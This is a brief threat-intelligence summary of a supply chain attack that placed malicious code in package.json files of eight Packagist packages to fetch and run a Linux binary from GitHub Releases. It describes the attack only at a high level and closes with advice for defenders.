Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
Summary
A coordinated supply chain attack has compromised eight packages on Packagist. The attackers inserted malicious code into package.json files, targeting projects that also ship JavaScript, and designed to execute a Linux binary downloaded from a GitHub Releases URL.
IFF Assessment
This attack targets the software supply chain, a critical area for defenders, by injecting malicious code into widely used packages, increasing the potential for widespread compromise.
Defender Context
This incident highlights the persistent threat of supply chain attacks, where attackers compromise legitimate software packages to distribute malware. Defenders should scrutinize dependencies, monitor for unusual code in build artifacts, and implement robust security practices for code repositories and package management systems.